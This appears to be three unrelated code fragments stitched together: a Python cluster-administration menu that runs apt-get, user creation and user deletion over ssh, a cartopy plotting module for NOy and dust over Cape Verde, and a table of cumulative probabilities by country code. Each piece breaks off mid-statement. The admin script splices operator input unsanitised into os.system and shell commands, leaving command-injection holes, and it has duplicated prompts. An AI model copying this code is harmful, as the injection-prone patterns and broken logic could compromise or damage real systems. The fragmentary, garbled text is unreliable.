ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
proc = subprocess.Popen(["ssh", "%s" % ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
print("Failed to execute on %s \nERROR\n%s" % (node, err))
else:
print("Response: %s" % out)
# Bring up the external interfaces
def ifup():
for node in nodes:
ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
proc = subprocess.Popen(["ssh", "%s" % ip, "ifup %s" % EXTERNAL_INTERFACE], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
print("Failed to execute on %s! \nERROR\n%s" % (node, err))
else:
command = "ifconfig %s | grep 'inet addr' | cut -d':' -f2 | cut -d' ' -f1" % EXTERNAL_INTERFACE
proc = subprocess.Popen(["ssh", "%s" % ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
print("Failed to execute on %s \nERROR\n%s" % (ip, err))
else:
print("%s %s up, ip: %s" % (node, EXTERNAL_INTERFACE, out.decode('ascii').strip()))
# Take down the external interfaces
def ifdown():
for node in nodes:
ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
proc = subprocess.Popen(["ssh", "%s" % ip, "ifdown %s" % EXTERNAL_INTERFACE], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
print("Failed to execute on %s! \nERROR\n%s" % (node, err))
else:
print("%s: %s down" % (node, EXTERNAL_INTERFACE))
# Add a system user and set the password expiration
def addSystemUser(fullname, username, uid, gid):
print("Adding %s to %s" % (fullname, HEAD_NODE))
os.system("useradd -m -d /home/%s -u %s -g %s -c '%s' -s /bin/bash %s" % (username, uid, gid, fullname, username))
os.system("chage -M 180 -I 5 -W 14 %s" % username)
for node in nodes:
print("Adding user %s to %s" % (fullname, node))
ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
command = "useradd -d /home/%s -u %s -g %s -c '%s' -s /bin/bash %s && chage -M 180 -I 5 -W 14 %s" % (username, uid, gid, fullname, username, username)
proc = subprocess.Popen(["ssh", ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
print("Failed to execute on %s! \nERROR\n%s" % (node, err))
# Remove a system user and optionally archive the home directory before removing it
def removeSystemUser(username, archivedir):
# Archive the users home directory
if archivedir != "":
homedir = subprocess.check_output(["grep %s /etc/passwd | cut -f6 -d:" % username], shell=True).decode('ascii').strip()
print("%s's Home Directory: %s" % (username, homedir))
archive = "%s/%s-%s" % (archivedir, username, time.strftime("%Y%m%d-%H%M%S"))
print("Archiving %s's home directory to %s" % (username, archivedir))
os.system("tar -zcf %s.tar.gz %s" % (archive, homedir))
# Remove the user and home dir from head node
print("Removing %s from %s" % (username, HEAD_NODE))
os.system("userdel -r %s" % username)
# Remove the user from all compute nodes
for node in nodes:
print("Removing %s from %s" % (username, node))
ip = subprocess.check_output(["getent hosts %s | cut -d' ' -f1" % node], shell=True).decode('ascii').strip()
command = "userdel %s" % username
proc = subprocess.Popen(["ssh", ip, command], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
print("Failed to execute on %s! \nERROR\n%s" % (node, err))
# Get the next available UID based on the range provided above
def getNextUID():
cmd = """awk -F: '{uid[$3]=1}END{for(x=%s; x<%s; x++) {if(uid[x] != ""){}else{print x; exit;}}}' /etc/passwd""" % (UID_MIN, UID_MAX)
uid = subprocess.check_output(cmd, shell=True).decode('ascii').strip()
return uid
# Get the next available UID based on the range provided above
def getNextGID(project):
if project:
GID_MIN = PROJECT_GID_MIN
cmd = """awk -F: '{gid[$3]=1}END{for(x=%s; x<%s; x++) {if(gid[x] != ""){}else{print x; exit;}}}' /etc/group""" % (GID_MIN, GID_MAX)
gid = subprocess.check_output(cmd, shell=True).decode('ascii').strip()
return gid
# Get a list of groups from the range provided above
def getGroups():
groups = {}
for line in open('/etc/group', 'r'):
parts = line.strip('\n').split(':')
if int(parts[2]) >= GID_MIN and int(parts[2]) < GID_MAX:
groups[parts[0]] = parts[2]
return groups
# Get a list of nodes from SGE... actually execution hosts
def getNodes():
# Get array of nodes
nodes = []
out = subprocess.Popen(["qconf", "-sel"], shell=False, stdout=subprocess.PIPE)
for node in out.stdout:
n = node.rstrip().decode('ascii')
if n != HEAD_NODE:
nodes.append(n)
return nodes
# Initialize nodes/groups
nodes = getNodes()
groups = getGroups()
# Bring up interfaces before we start
print("Bringing up interfaces (this can take a minute or two)...")
ifup()
# Loop until user wants to quit.
selection = True
while selection:
os.system('clear')
print(menu)
print("Please make sure no jobs are running on the cluster before attempting any maintenance that would adversly affect performance.")
#print("Nodes in this cluster: %s" % nodes)
selection = input("What would you like to do? ")
os.system('clear')
#
# Update/update all nodes
#
if selection == "1":
print("\nUpdate/Upgrade All Nodes\n")
print("\nWARNING!!!\n")
print("You are about to perform an update/upgrade on all nodes.")
confirm = input("Are you sure you want to continue (y/N)? ")
if confirm == "y" or confirm == "Y":
execute("apt-get update")
execute("apt-get -y upgrade")
time.sleep(2)
else:
print("CANCELED. Returning to menu...")
time.sleep(2)
#
# Install package(s) on all nodes
#
elif selection == "2":
print("\nInstall package(s) on All Nodes\n")
packages = input("Package(s) to install from apt-get... separated by a single space: ")
print("\nWARNING!!!\n")
print("You are about to install the following packages on all nodes.\n%s" % packages)
confirm = input("Are you sure you want to continue (y/N)? ")
if confirm == "y" or confirm == "Y":
execute("apt-get install -y %s" % packages)
time.sleep(2)
else:
print("CANCELED. Returning to menu...")
time.sleep(2)
#
# Execute an R script on all nodes
#
elif selection == "3":
print("\nExecute An R Script On All Nodes (The script must specify a CRAN mirror)\n")
print("Script must be somewhere inside the home directory and must be executable.\n")
full_path = input("Full path to script: ")
print("\nWARNING!!!\n")
print("You are about to execute an R script on all nodes.")
confirm = input("Are you sure you want to continue (y/N)? ")
if confirm == "y" or confirm == "Y":
execute("Rscript " + full_path)
time.sleep(2)
else:
print("CANCELED. Returning to menu...")
time.sleep(2)
#
# Add a system user to all nodes (including head)
#
elif selection == "4":
print("\nAdd A System User To All Nodes (including head node)\n")
fullname = input("Full Name: ")
username = input("Username (lowercase recommended): ")
print("\nAdd A System User To All Nodes (including head node)\n")
fullname = input("Full Name: ")
avail_grps = "Available Groups: "
for group, gid in groups.items():
avail_grps = "%s %s=%s" % (avail_grps, group, gid)
print(avail_grps)
gid = input("Select a GID (eg. 1500): ")
print("\nWARNING!!!\n")
print("You are about to add the following system user to all nodes (including %s)." % HEAD_NODE)
print("Full Name[%s], | |
vars2use = ['NOy', 'PM2.5(dust)', ]
# Now loop and plot
for var in vars2use:
# for var in vars2use[:2]: # For testing
# Plot up by level
# for lev2use in ds.lev.values:
for lon2use in list(ds.lon.values):
if verbose:
print(var, lev2use)
# Get units for species
units = ds[var].units
# Select for level and variable, and average over time
ds_tmp = ds.sel(lon=lon2use).mean(dim='time')
# Get the LateX for of the species name
try:
LaTeX_spec = AC.latex_spec_name(var)
except KeyError:
print('WARNING: not converted {} to LaTeX form'.format(var))
LaTeX_spec = var
# Set title
title = 'Average [{}] @ {:.0f}hPa in Feb {}'.format(
LaTeX_spec, lev2use, year)
# Plot up and add title
# quick_map_plt_CV_1layer(ds_tmp, var2plot=var, title=title,
# use_local_CVAO_area=use_local_CVAO_area,
# save_plot=False, units=units)
# vertical plot
del ds_tmp
# Save to PDF
AC.plot2pdfmulti(pdff, savetitle, dpi=dpi, tight=True)
if show_plot:
plt.show()
plt.close()
# Save entire pdf
AC.plot2pdfmulti(pdff, savetitle, close=True, dpi=dpi)
plt.close('all')
def quick_map_plt_CV_1layer(ds, var2plot=None, extra_str='',
projection=ccrs.PlateCarree(),
save_plot=True, show_plot=False,
savename=None, units=None, title=None,
LatVar='lat', LonVar='lon', fig=None,
ax=None, extents=None, region='Cape_Verde',
use_local_CVAO_area=True,
add_flyable_range_as_circle=True,
add_flyable_range=False,
add_detailed_map=True, add_ARNA_locs=True,
extend='neither', folder='./', dpi=320):
"""
Plot up a quick spatial plot of data using cartopy
Parameters
-------
ds (xr.Dataset): dataset object holding data to plot
var2plot (str): variable to plot within the dataset
LatVar, LonVar (str): variables to use for latitude and longitude
save_plot (bool): save the plot as a .png ?
show_plot (bool): show the plot on screen
dpi (int): resolution to use for saved image (dots per square inch)
savename (str): name to use for png of saved .png
extra_str (str): extra string to append to save .png
projection (cartopy.crs obj.): projection to use
fig (figure instance): matplotlib figure instance
ax (axis instance): axis object to use
Returns
-------
(None)
"""
# Use the 1st data variable if not variable given
if isinstance(var2plot, type(None)):
pstr = 'WARNING: No variable to plot(var2plot), trying 1st data_var'
print(pstr)
var2plot = list(ds.data_vars)[0]
# Setup figure and axis and plot
if isinstance(fig, type(None)):
fig = plt.figure(figsize=(10, 6))
# fig = plt.figure()
if isinstance(ax, type(None)):
ax = fig.add_subplot(111, projection=projection, aspect='auto')
# Setup plotted range
vmin, vmax = set_limits4ar_plotted_range(var2plot)
# Now plot up
ds[var2plot].plot.imshow(x=LonVar, y=LatVar, ax=ax,
transform=ccrs.PlateCarree(),
vmin=vmin, vmax=vmax, extend=extend)
# Add some grid lines
gl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
linewidth=.5, color='gray', alpha=0.25, linestyle='--')
gl.xlabels_top = False
gl.ylabels_right = False
# Limit plot to Cape Verde region
if use_local_CVAO_area:
d = get_analysis_region('local_CVAO_area')
extents = (d['x0'], d['x1'], d['y0'], d['y1'])
# Mark known places to help geo-locate viewers
if add_ARNA_locs:
# colours = AC.get_CB_color_cycle()
locs2plot = 'Praia Airport', 'Dakar', 'Sao Vicente Airport',
for loc2plot in locs2plot:
lon, lat, alt = AC.get_loc(loc2plot)
# Now plot up locations
ax.plot(lon, lat, 'bo', markersize=5, markerfacecolor='none',
markeredgewidth=2,
zorder=10,
markeredgecolor='black',
transform=ccrs.PlateCarree())
# Add a label for the location?
# ax.text(lon, lat+0.25, loc2plot, transform=ccrs.PlateCarree())
# Add a box to show the flyable range
if add_flyable_range:
# Get the minimum
d = get_max_flying_range4BAE146()
min_lon = d['min_lon']
max_lon = d['max_lon']
min_lat = d['min_lat']
max_lat = d['max_lat']
# Create new lists
lons = [min_lon, min_lon, max_lon, max_lon]
lats = [min_lat, max_lat, max_lat, min_lat]
# Now plot as a linear ring
ring = LinearRing(list(zip(lons, lats)))
ax.add_geometries([ring], ccrs.PlateCarree(),
facecolor='none', edgecolor='grey',
zorder=10, linestyle=':',
)
if add_flyable_range_as_circle:
# n_points = 1000
# Approximate from James' max distance
# ( 16.8331-13 ) *110667.45
locs4circles = 'Dakar', 'Sao Vicente Airport',
for loc in locs4circles:
# Get locations to centre circle on
lon, lat, alt = AC.get_loc(loc)
# Radius in degrees
# radius = 16.8331-13
radius = 21 - 16.8331
# Plot up circle
ax.add_patch(mpatches.Circle(xy=[lon, lat],
radius=radius,
transform=projection,
facecolor='none',
edgecolor='grey',
linestyle=':',
zorder=10
))
# Get limits of plotting data
if isinstance(extents, type(None)):
x0 = float(ds[LonVar].min())
x1 = float(ds[LonVar].max())
y0 = float(ds[LatVar].min())
y1 = float(ds[LatVar].max())
extents = (x0, x1, y0, y1)
ax.set_extent(extents, crs=ccrs.PlateCarree())
# Beautify the figure/plot
if add_detailed_map:
# Add borders for countries
ax.add_feature(cfeature.BORDERS, edgecolor='grey',
facecolor='none', zorder=50)
# Also add minor islands (inc. Cape Verde)
land_10m = cfeature.NaturalEarthFeature('physical', 'land', '10m',
edgecolor=None,
facecolor='none')
ax.add_feature(land_10m, edgecolor='grey', facecolor='none', zorder=50)
# Update the colour bar lanel
if not isinstance(units, type(None)):
im = ax.images
cb = im[-1].colorbar
cb.set_label('{}'.format(units))
# Add a generic title if one is not provided
if not isinstance(title, type(None)):
plt.title(title)
# Save the plot?
if save_plot:
if isinstance(savename, type(None)):
savename = 'spatial_plot_{}_{}'.format(var2plot, extra_str)
savename = AC.rm_spaces_and_chars_from_str(savename)
plt.savefig(folder+savename+'.png', dpi=dpi)
if show_plot:
plt.show()
def plot_spatial_concs_2layer(ds, show_plot=False, folder=None,
var2plot1='NOy', var2plot2='PM2.5(dust)',
extr_title_str='', region='Cape_Verde',
add_max_vals_as_txt=False,
testing_mode=False,
verbose=False, testing=False):
"""
Plot up a two layer plot on a single map for given levels
"""
# Local variables
try:
LaTeX_spec1 = AC.latex_spec_name(var2plot1)
except KeyError:
LaTeX_spec1 = var2plot1
try:
LaTeX_spec2 = AC.latex_spec_name(var2plot2)
except KeyError:
LaTeX_spec2 = var2plot2
# Set data below threshold to zero based on variable name
ds = set_values_below_range2NaNs4spec(var=var2plot1, ds=ds)
ds = set_values_below_range2NaNs4spec(var=var2plot2, ds=ds)
# Set lists of variables to loop and plot
if testing_mode:
levs2use = [700]
times2use = ds.time[:4]
else:
levs2use = ds.lev.values
times2use = ds.time.values
# Plot up by level and time
for time2use in times2use:
for lev2use in levs2use:
# Get time as human readable string
dstr = AC.dt64_2_dt([time2use])[0].strftime('%Y/%m/%d %H:%M')
# Print out status
pstr = "'plotting 2layer @ {:.0f}hPa on {}"
print(pstr.format(lev2use, dstr))
# Select for level and variable, and average over time
ds_tmp = ds.sel(lev=lev2use, time=time2use)
# Set title
title = '[{}] & [{}] @ {:.0f}hPa on {}'.format(
LaTeX_spec1, LaTeX_spec2, lev2use, dstr)
# Add extra string to existing title string
title += '\n ' + extr_title_str
# Save plots
extra_str = 'lev_{}_dt_{}'.format(lev2use, dstr)
quick_map_plt_2layer(ds_tmp, var2plot1=var2plot1,
folder=folder, region=region,
var2plot2=var2plot2, title=title,
add_max_vals_as_txt=add_max_vals_as_txt,
save_plot=True, extra_str=extra_str)
# Tidy up...
plt.close('all')
def set_values_below_range2NaNs4spec(var=None, ds=None):
"""
To improve aesthetics of plots, values below a threshold are removed
"""
# Limit plotted NOy values to those above 0.5 pptv
if var == 'NOy':
arr = ds[var].values
arr[arr < 0.5] = np.NaN
ds[var].values = arr
# Limit Dust values to those about
elif 'Dust' in var:
arr = ds[var].values
arr[arr < 15] = np.NaN
ds[var].values = arr
else:
pstr = "WARNING: No case set for '{}', so not restricting array values"
print(pstr.format(var))
return ds
def plt_spatial_2layer_vertical_lon(ds, show_plot=False, folder=None,
var2plot1='NOy',
var2plot2='PM2.5(dust)',
extr_title_str=None,
testing_mode=False,
):
"""
Plot up a two layer plot on a single map for given levels
"""
# Local variables
try:
LaTeX_spec1 = AC.latex_spec_name(var2plot1)
except KeyError:
LaTeX_spec1 = var2plot1
try:
LaTeX_spec2 = AC.latex_spec_name(var2plot2)
except KeyError:
LaTeX_spec2 = var2plot2
# Set data below threshold to zero based on variable name
ds = set_values_below_range2NaNs4spec(var=var2plot1, ds=ds)
ds = set_values_below_range2NaNs4spec(var=var2plot2, ds=ds)
# Set lists of variables to loop and plot
if testing_mode:
lons2use = [-24.]
times2use = ds.time[:4]
else:
lons2use = ds.lon.values
times2use = ds.time.values
# Plot by time and lon
for time2use in times2use:
for lon2use in lons2use:
# Get time as human readable string
dstr = AC.dt64_2_dt([time2use])[0].strftime('%Y/%m/%d %H:%M')
# Print out status
pstr = "'plotting 2layer @ {:.1f}$^{}$W on {}"
print(pstr.format(lon2use*-1, '{\circ}', dstr))
# Select for level and variable, and average over time
ds_tmp = ds.sel(lon=lon2use, time=time2use)
# Set title
title_str = '[{}] & [{}] @ {:.1f}$^{}$W on {}'
title = title_str.format(LaTeX_spec1, LaTeX_spec2, lon2use*-1,
'{\circ}', dstr)
if not isinstance(extr_title_str, type(None)):
title += extr_title_str
# Save plots
extra_str = 'lon_{}E_dt_{}'.format(lon2use, dstr)
# Update the long_names - var1
attrs = ds_tmp[var2plot1].attrs
attrs['long_name'] = LaTeX_spec1
ds_tmp[var2plot1].attrs = attrs
# Update the long_names - var2
attrs = ds_tmp[var2plot2].attrs
attrs['long_name'] = LaTeX_spec2
ds_tmp[var2plot2].attrs = attrs
# Now call plotter
quick_lon_plot_2layer(ds_tmp, var2plot1=var2plot1,
folder=folder,
var2plot2=var2plot2, title=title,
save_plot=True, extra_str=extra_str
)
plt.close('all')
def plt_spatial_2layer_vertical_lat(ds, show_plot=False, folder=None,
var2plot1='NOy',
var2plot2='PM2.5(dust)',
extr_title_str=None,
testing_mode=False,
):
"""
Plot up a two layer plot on a single map for given levels
"""
# Local variables
try:
LaTeX_spec1 = AC.latex_spec_name(var2plot1)
except KeyError:
LaTeX_spec1 = var2plot1
try:
LaTeX_spec2 = AC.latex_spec_name(var2plot2)
except KeyError:
LaTeX_spec2 = var2plot2
# Set data below threshold to zero based on variable name
ds = set_values_below_range2NaNs4spec(var=var2plot1, ds=ds)
ds = set_values_below_range2NaNs4spec(var=var2plot2, ds=ds)
# Set lists of variables to loop and plot
if testing_mode:
lats2use = [16.]
times2use = ds.time[:4]
else:
lats2use = ds.lat.values
times2use = ds.time.values
# Plot up by level and time
for time2use in times2use:
for lat2use in lats2use:
# Get time as human readable string
dstr = | |
0.020043961872515337,
0.03349805785639342,
0.05492093713529983,
0.07197670056780921,
0.11082793065442348,
0.1726905197856368,
0.2474840042903689,
0.3194774175219229,
0.43857065063945483,
0.4878223722128196,
0.49687497006014864,
0.4978109091076936,
0.49787578355651946,
0.612510479368423,
0.7073262127729109,
0.7985922945852948,
0.8247333717910478,
0.8750582198992454,
0.923499038102326,
0.9271026379108194,
0.9375087094497486,
0.9575417006489176,
0.9768247093657345,
0.977139869474318,
0.9783704377996956,
0.9820076553270808,
0.9893397802247202,
1.0],
'GER': [0.0009004606909934688,
0.002114028415816856,
0.003191250529944268,
0.0038460104903161527,
0.00414777762073264,
0.0067899540496156085,
0.011742187616986595,
0.01638317544764487,
0.01928271128351923,
0.029447358503363767,
0.048498965584681725,
0.06635318740520439,
0.09568129698215659,
0.15065099814473942,
0.20706469637773267,
0.2613216088454941,
0.3670578522677689,
0.4185727314995056,
0.4297274593029854,
0.43108610993464314,
0.43119798824991995,
0.5328917662457948,
0.6319825325245769,
0.7272849005796986,
0.7594696948225171,
0.8213783311545428,
0.8809201014634555,
0.8861469304574823,
0.9012279273835276,
0.930236780047772,
0.9581365779531252,
0.958680556464165,
0.9608082140469829,
0.9671182915443932,
0.9799328386340234,
1.0],
'ICE': [0.020015632485829295,
0.032685374382500014,
0.038855898651463,
0.040912942694583794,
0.04143282825391651,
0.06949622446436116,
0.09833298535657736,
0.11314870424746053,
0.11822337328013781,
0.17829311890893026,
0.2400182529078238,
0.27173132350017853,
0.3681658653010618,
0.467257928243448,
0.5704670757102871,
0.6256969130792771,
0.7317502747277518,
0.7826616844509008,
0.7935240218407631,
0.7948276507423141,
0.7949333374491911,
0.8516851860986713,
0.9061731641170727,
0.9353310657021847,
0.952769203954861,
0.9714323857241459,
0.98141952852306,
0.9842099483255415,
0.9886896219493873,
0.9934839963199467,
0.9960495878713848,
0.9963354585262875,
0.9969574253718334,
0.9979833312812594,
0.9991416152795768,
1.0],
'IRN': [0.0017932806937065308,
0.0029800022035628973,
0.0034684714452978597,
0.0036040805695554683,
0.003632449451972191,
0.010203701802837323,
0.015741444346236217,
0.018074834607297537,
0.018730301471607442,
0.04505278130621857,
0.06723532865713482,
0.07658219510109027,
0.15566220614559337,
0.22230471477424846,
0.3806902008959091,
0.539301472459069,
0.6727764933411026,
0.7008570657743881,
0.7034826708184224,
0.7036207649953946,
0.7036255239216673,
0.8372908192869065,
0.8935320243231262,
0.94985340365827,
0.9577414475350371,
0.9735400247920338,
0.9893611236122646,
0.9899142877573227,
0.9915761458715838,
0.9949046002030375,
0.9982377993917955,
0.9982617405693633,
0.9983583224087909,
0.9986519163327938,
0.9992538684360962,
1.0],
'JPN': [0.020333426930712488,
0.0341911696223374,
0.04159567992238613,
0.044313123995475136,
0.04507029299543652,
0.07159939570722547,
0.10171925546877919,
0.11881757126768709,
0.1252884381192952,
0.18070199499124434,
0.2436158665987565,
0.2793305496481871,
0.36614074971112237,
0.4647008510524358,
0.5553647157619475,
0.6027090160751905,
0.7056443818189208,
0.7615945672197578,
0.775110808314978,
0.7769474856069272,
0.777117306599973,
0.8308697346951034,
0.8893036518612434,
0.9198176050404603,
0.9409919829329735,
0.9631063304539229,
0.9746543525200219,
0.978490774078585,
0.9845008651433803,
0.9907777552184569,
0.9940555216108315,
0.9945044289275082,
0.9954596157736768,
0.9970026939148475,
0.9987148680415886,
1.0],
'KOR': [0.017904881928060824,
0.028424635310151856,
0.033042933059789364,
0.034425331227746124,
0.03473853193234269,
0.0628037483016792,
0.08859226057248232,
0.10044050995686939,
0.10406954219159724,
0.1672159586954447,
0.2252398169631447,
0.25189824284598955,
0.35845728014689193,
0.4563720442746935,
0.5762503531232865,
0.6436815597877116,
0.7538351106480132,
0.7988209761224275,
0.8069862572299834,
0.8078199167774889,
0.8078769468023982,
0.8698380048472073,
0.9204468467789786,
0.948914175957426,
0.9626930179295496,
0.9781941365146009,
0.9869134714875234,
0.9887891959542945,
0.9919544649352937,
0.9955153744752477,
0.9975183759307089,
0.9976802588203123,
0.9980495675593898,
0.9986872678013556,
0.9994380577136132,
1.0],
'MAR': [0.0038324841701699703,
0.006964850571808668,
0.008684492195714232,
0.009326535969497769,
0.009507782127440273,
0.019102674623302066,
0.030070275220585828,
0.03633862387136117,
0.038727003745892594,
0.06907428123149861,
0.10376323880143694,
0.1235891322091689,
0.1955772173689746,
0.2778643890216556,
0.39170841577569576,
0.4817265236250979,
0.6118578217468137,
0.658887678170738,
0.6664417833183155,
0.6671243026000518,
0.667165401571737,
0.7700620889334004,
0.8444364554841771,
0.9032453358469862,
0.921164754316332,
0.9495030376740912,
0.9719105255353295,
0.974069236749766,
0.9791900086810862,
0.9872881445803315,
0.9936914570029705,
0.9938552743746943,
0.9943797761085063,
0.995649506114159,
0.9977399433650737,
1.0],
'MEX': [0.005337418714145114,
0.009682915641264233,
0.01212938047930288,
0.013068360667741129,
0.013341125659747216,
0.025012507555658405,
0.038762005839609925,
0.04686081987664417,
0.05004109537721866,
0.08390794223680045,
0.1238048590656295,
0.14730518637756157,
0.2210087542009344,
0.30783541177638296,
0.4147682268765998,
0.4923399597176726,
0.6183124084671744,
0.6694555802861476,
0.6786837851645237,
0.6796204178813606,
0.6796840974512717,
0.7710676557217047,
0.8452687222000981,
0.8990960276908423,
0.91917913808377,
0.9483167170871459,
0.9694538440950454,
0.9721716710899713,
0.9780864096861933,
0.9866678076748446,
0.992892967945382,
0.9931260697814999,
0.9938118272684908,
0.9953387257783045,
0.9976564817276596,
1.0],
'NGA': [0.010648675373241106,
0.01715405196386166,
0.019966048344624246,
0.020792095784669583,
0.020975514376547537,
0.041750597411956525,
0.060420926990323365,
0.06881033284662533,
0.07132348721905109,
0.12494281399137983,
0.17312988986988637,
0.1947824769266046,
0.2985738383841345,
0.39184994815932356,
0.5257897961168704,
0.6122126092439121,
0.7325828191141467,
0.7744959057747992,
0.7809822165777321,
0.7815468523524067,
0.7815795618816944,
0.8592467558669774,
0.9133344215062456,
0.9482337310940986,
0.9607893350078076,
0.9769919905621959,
0.9874465273896721,
0.9889038207279475,
0.9917247151465743,
0.9953650004673308,
0.9977138436443409,
0.9978202018907711,
0.9980979560789768,
0.9986462307681805,
0.9993817324936233,
1.0],
'PAN': [0.03581194327227596,
0.05110512340939498,
0.05622184337882768,
0.057385852504986214,
0.0575860512128584,
0.10499146118976872,
0.13800130075398925,
0.14949418214227717,
0.15216179730084792,
0.24447285090789844,
0.3087518661312049,
0.33113159010048315,
0.4659473836279662,
0.5598237516887609,
0.6910850143743292,
0.7549852393813398,
0.8463864786989205,
0.8790709745198394,
0.8842655370397237,
0.884729922583728,
0.8847575795953443,
0.9292532642993984,
0.961076006126901,
0.9765678604753433,
0.9841542657949855,
0.9915406492107962,
0.995136466838949,
0.9960407501025639,
0.9973614117242676,
0.9986472530007933,
0.9992732225001887,
0.9993410869896914,
0.999474844759244,
0.9996741577466434,
0.999876098080442,
1.0],
'PER': [0.004363065334594547,
0.007845896300614705,
0.009727158812499474,
0.01041840004337029,
0.010610456739643897,
0.021138213138184262,
0.032984083456783816,
0.03964859193764747,
0.04214823510987688,
0.07454062483291976,
0.1109886611896408,
0.131494393641295,
0.20624443098887504,
0.2903534486379417,
0.40535099654428064,
0.4938087183978387,
0.6232043833321347,
0.670524271728953,
0.678215313650727,
0.6789184655793066,
0.6789613311436017,
0.7784942859430951,
0.8512925255952373,
0.9072899494692025,
0.9250381204380593,
0.9523424029998268,
0.9733452389405283,
0.9755087361229118,
0.9805013129771445,
0.9881820328315177,
0.9940901499425593,
0.9942563793171604,
0.9947742081982919,
0.995993996186654,
0.9979485411482054,
1.0],
'POL': [0.010301958864491877,
0.01918502721562038,
0.02496565287950454,
0.027555267957594408,
0.028436883738041957,
0.043992913214702556,
0.06560408714079437,
0.08061572102733709,
0.08756734561173869,
0.12446500158393531,
0.17572497520873587,
0.21133136844405687,
0.2769700819547185,
0.3681584958165015,
0.4460033814027519,
0.4921638398260582,
0.6003096468383958,
0.6636512815070672,
0.6801399782370362,
0.6825543598790194,
0.6827960737882638,
0.7469243718858548,
0.8220450139567553,
0.8665900505244287,
0.8959224515213418,
0.9307095044273046,
0.9513375302409706,
0.9570642501179896,
0.9672517407717781,
0.9793336967081381,
0.986498054655002,
0.9872243261261501,
0.9889817417149088,
0.9922134617868721,
0.9963045752313038,
1.0],
'POR': [0.002125097936991622,
0.0043588029233337326,
0.005928312330776208,
0.00668122297983298,
0.006954747691890236,
0.01253815883847095,
0.02077156182576651,
0.026842127199831933,
0.029826050454705256,
0.04886948666336562,
0.07695129551686139,
0.09765627700874274,
0.14637010800461261,
0.2182044385087577,
0.30127898816084836,
0.37211493617408103,
0.49461822803583727,
0.5475823547888352,
0.557759673038185,
0.5588597103628401,
0.5589395944297281,
0.6633956143553299,
0.7537184423442558,
0.8307348471833602,
0.8567688126798044,
0.901166059109849,
0.9390226716731429,
0.9427745878529217,
0.9523721315257014,
0.968739384974728,
0.9826954030246612,
0.9830393266798895,
0.9842296759127459,
0.9873497173223406,
0.9929329757085167,
1.0],
'SEN': [0.011536875424868321,
0.018565473979297982,
0.0216200879805583,
0.022522750659971193,
0.022724419678738377,
0.044480853334088744,
0.0641605641660126,
0.07306117316662654,
0.07574484541020102,
0.13070955363445627,
0.18042770050309084,
0.20291389398897117,
0.30705961008044685,
0.4012642765957171,
0.5328193602195984,
0.6159084236818207,
0.7349061438596802,
0.7775124051938401,
0.7842923427596338,
0.7848992194950152,
0.7849354099635786,
0.8600933502829833,
0.9139128493759003,
0.9479047837995171,
0.9607512351981888,
0.9769786524309627,
0.9872277500951533,
0.9887609426770232,
0.9916659965653021,
0.9953356108475517,
0.9976533077816471,
0.9977685220908113,
0.9980631405519136,
0.9986327248949722,
0.999381476348388,
1.0],
'SRB': [0.009659570224542504,
0.01688068560341593,
0.02079080706209569,
0.02223774666966077,
0.022643408580371876,
0.03985210615761824,
0.05944790411608342,
0.07060491631602805,
0.07483980114502915,
0.11832114500888427,
0.16783399311920585,
0.196024498634304,
0.278422974276643,
0.37225133482077444,
0.4763497547383653,
0.5421063172527995,
0.6606447246682307,
0.7140665942706088,
0.724766909192587,
0.7259724906596615,
0.7260639398446146,
0.8009419082493696,
0.868432625417366,
0.9110649493864967,
0.9313423732219847,
0.9569599318578504,
0.9731419507322968,
0.9761881023710512,
0.9819606528330307,
0.9892534258764902,
0.9938601018175417,
0.99415189433233,
0.9949005295180249,
0.996355720494731,
0.9982887743085999,
1.0],
'SWE': [0.004674884432654913,
0.008801079332110441,
0.011325213756535883,
0.012379695770476455,
0.012713345241157095,
0.022887064370607255,
0.03595585189847154,
0.04434969515654127,
0.04794383651514449,
0.07781297204798239,
0.11618177120125096,
0.14082534929954194,
0.20659519556670963,
0.291080734794719,
0.38762794762474895,
0.4584914575330907,
0.5825124762803755,
0.6367759932548,
0.6473280729808402,
0.6484822986175773,
0.6485671732694319,
0.7395958465291461,
0.8192522790674569,
0.8777183313850854,
0.9009533078582936,
0.935061221225569,
0.9600956721020526,
0.9634843760303317,
0.970946076291554,
0.9818995208270287,
0.9899391058405969,
0.9902536842500569,
0.9911910651942757,
0.9933066376113097,
0.9965672834237833,
1.0],
'SWI': [0.004172791453403903,
0.007706143745999988,
0.009742441934362784,
0.010541923539827044,
0.01077942365166592,
0.0206236913549515,
0.03247806476809165,
0.03961552655061013,
0.04248048105144964,
0.07263696906953493,
0.1089511247355736,
0.13081570493712807,
0.2001007292524511,
0.2835330956739992,
0.38965541317763835,
0.4709279997404211,
0.5987194837871311,
0.6489537143116052,
0.6577300873929762,
0.6585925751241172,
0.6586492687701164,
0.7565169434825209,
0.8334595874947024,
0.8923852484013723,
0.9125491090597644,
0.9434336421033037,
0.9670862153252002,
0.9697283215451703,
0.9757986037870715,
0.9850963189250493,
0.9922168697777152,
0.9924358961261438,
0.9931158407815761,
0.9947129661488597,
0.9972687087838774,
1.0],
'TUN': [0.017112039522641107,
0.02695731487333092,
0.03115073340380671,
0.0323672353781048,
0.032634228932956665,
0.06043029528577314,
0.08515566839748659,
0.09615262148706465,
0.09941331989885359,
0.16305330526903739,
0.21966283998265473,
0.24484071676759872,
0.3541200574081898,
0.45132706635846376,
0.5764263439209136,
0.648031045939192,
0.7593103282115901,
0.802544495500978,
0.8100099690895386,
0.8107350895419518,
0.8107821743970712,
0.8744765458049738,
0.9239695520970301,
0.9522985083994544,
0.9651178393056785,
0.9797929739267504,
0.988192771768072,
